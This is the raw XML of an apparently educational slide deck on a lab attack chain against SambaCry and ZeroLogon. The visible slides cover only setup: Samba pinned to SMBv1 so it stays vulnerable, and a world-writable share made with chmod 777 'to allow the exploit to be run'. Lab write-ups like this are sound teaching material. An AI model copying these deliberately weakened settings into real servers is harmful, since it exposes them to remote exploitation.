              <a:t> setup, the Samba version will not be vulnerable to the SambaCry attack., since apt likely has a more up-to-date debian free software guidelines (dfsg) version .</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto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9"/>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TABLE OF CONTENTS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Google Shape;211;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4865813" y="1393775"/>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05</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Google Shape;212;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4865813" y="2290500"/>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06</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Google Shape;213;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4865813" y="3187225"/>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07</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Google Shape;214;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2526263" y="1393775"/>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01</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="13" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2526263" y="229050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02</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Google Shape;216;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="15" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2526263" y="3187225"/>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03</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Google Shape;217;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="16" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196625" y="1355680"/>
            <a:ext cx="2219400" cy="682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sz="1600"/>
              <a:t>Case Scenario &amp; Network Diagram</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="218" name="Google Shape;218;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3296543" y="1508388"/>
            <a:ext cx="428915" cy="426116"/>
            <a:chOff x="6226275" y="3911538"/>
            <a:chExt cx="900325" cy="894450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="219" name="Google Shape;219;p19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6355100" y="4405488"/>
              <a:ext cx="87300" cy="116625"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="4665" w="3492">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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6514125" y="4593038"/>
              <a:ext cx="119900" cy="87550"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3502" w="4796">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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6330650" y="4455438"/>
              <a:ext cx="258525" cy="246400"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="9856" w="10341">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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6226275" y="4198463"/>
              <a:ext cx="243025" cy="181575"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="7263" w="9721">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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6656850" y="4568588"/>
              <a:ext cx="188400" cy="237400"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="9496" w="7536">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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6718825" y="4152263"/>
              <a:ext cx="172100" cy="156800"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="6272" w="6884">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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6906375" y="3911538"/>
              <a:ext cx="220225" cy="216700"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="8668" w="8809">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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6429325" y="3953688"/>
              <a:ext cx="655675" cy="654050"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="26162" w="26227">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 name="Google Shape;227;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3296531" y="2415313"/>
            <a:ext cx="428938" cy="428938"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="40939" w="40939">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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4808167" y="3325066"/>
            <a:ext cx="432968" cy="433836"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="32491" w="32426">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9" name="Google Shape;229;p19"/>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
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="16" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196625" y="2288393"/>
            <a:ext cx="2219400" cy="682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sz="1600"/>
              <a:t>Setup and Configuration</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="Google Shape;231;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="16" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="306875" y="3986405"/>
            <a:ext cx="2219400" cy="682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sz="1600"/>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t> SambaCry</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>(CVE-2017-7494)</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Google Shape;232;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="16" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6323875" y="1346200"/>
            <a:ext cx="2623500" cy="68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1600"/>
              <a:t>Ubuntu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>Post-Exploits + Pivoting into Windows</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Google Shape;233;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="16" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6285375" y="2161450"/>
            <a:ext cx="2623500" cy="68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1600"/>
              <a:t>Exploiting ZeroLogon</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>(CVE-2020-1472)</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="234" name="Google Shape;234;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4808182" y="4186864"/>
            <a:ext cx="432964" cy="431586"/>
            <a:chOff x="5812000" y="2553488"/>
            <a:chExt cx="769850" cy="767400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="235" name="Google Shape;235;p19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5858475" y="2553488"/>
              <a:ext cx="150900" cy="150900"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="6036" w="6036">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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5812000" y="2732888"/>
              <a:ext cx="244675" cy="425725"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="17029" w="9787">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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6384475" y="2553488"/>
              <a:ext cx="150875" cy="150900"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="6036" w="6035">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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6337975" y="2732088"/>
              <a:ext cx="243875" cy="425700"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="17028" w="9755">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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6057450" y="2834013"/>
              <a:ext cx="279750" cy="486875"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="19475" w="1119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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6108825" y="2627688"/>
              <a:ext cx="175375" cy="175375"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="7015" w="7015">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 name="Google Shape;241;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="16" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6285375" y="3149125"/>
            <a:ext cx="2623500" cy="68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1600"/>
              <a:t>Windows Server Post-Exploits</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="Google Shape;242;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="15" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2558288" y="406060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04</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Google Shape;243;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3296543" y="4186869"/>
            <a:ext cx="428915" cy="428530"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="31446" w="3148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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4844213" y="4007750"/>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08</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Google Shape;245;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="16" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196625" y="3061205"/>
            <a:ext cx="2219400" cy="682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sz="1600"/>
              <a:t>Reconnaissance</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Google Shape;246;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="16" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6285375" y="4059738"/>
            <a:ext cx="2623500" cy="68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1600"/>
              <a:t>References and Additional Troubleshooting</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Google Shape;247;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3287738" y="3337769"/>
            <a:ext cx="476178" cy="282154"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="31023" w="52356">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966"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="248" name="Google Shape;248;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4814284" y="1530697"/>
            <a:ext cx="420775" cy="420811"/>
            <a:chOff x="-5251625" y="3272950"/>
            <a:chExt cx="292225" cy="292250"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="249" name="Google Shape;249;p19"/>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9"/>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9"/>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 name="Google Shape;252;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4847500" y="2417101"/>
            <a:ext cx="354341" cy="353394"/>
            <a:chOff x="-46779100" y="3938500"/>
            <a:chExt cx="299325" cy="298525"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="253" name="Google Shape;253;p19"/>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9"/>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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4132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Configuring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Samba on Ubuntu 14.04</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="405" name="Google Shape;405;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4761729" y="1019850"/>
            <a:ext cx="4070575" cy="2430975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="406" name="Google Shape;406;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="321625" y="1426335"/>
            <a:ext cx="4326050" cy="1473365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="Google Shape;407;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354650" y="3156600"/>
            <a:ext cx="3656700" cy="186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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Adding server min and max protocol to NT1 limits the SMB service to use v1 of the protocol, which is vulnerable to SambaCry. Later versions are not vulnerable. A similar configuration should also be done for the client (kali linux attacker machine)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>*see footnotes for configuration details</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1100">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Google Shape;408;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4761725" y="3520050"/>
            <a:ext cx="3711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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>As for the basic configuration of the samba share at the end of the file, we will include that it is browsable, can be written to and various other properties like comments.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4132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Creating the Samba Share</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="Google Shape;414;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530875" y="3520050"/>
            <a:ext cx="7942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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We can make the share using the following commands (mine had already been created):</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ mkdir /home/smbshare</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ chmod 777 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/home/smbshare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>                  # to allow the exploit to be run</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="415" name="Google Shape;415;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="902" r="2066" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="594750" y="1084125"/>
            <a:ext cx="7500475" cy="2195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39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4132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Configuring the 2 Network Interfaces on Ubuntu</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Google Shape;421;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5641325" y="1361325"/>
            <a:ext cx="2832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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Add a new network interface to the Ubuntu machine, configuring it as host-only. This will allow us to perform the pivoting attack later on and make the ubuntu server the “proxy”.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
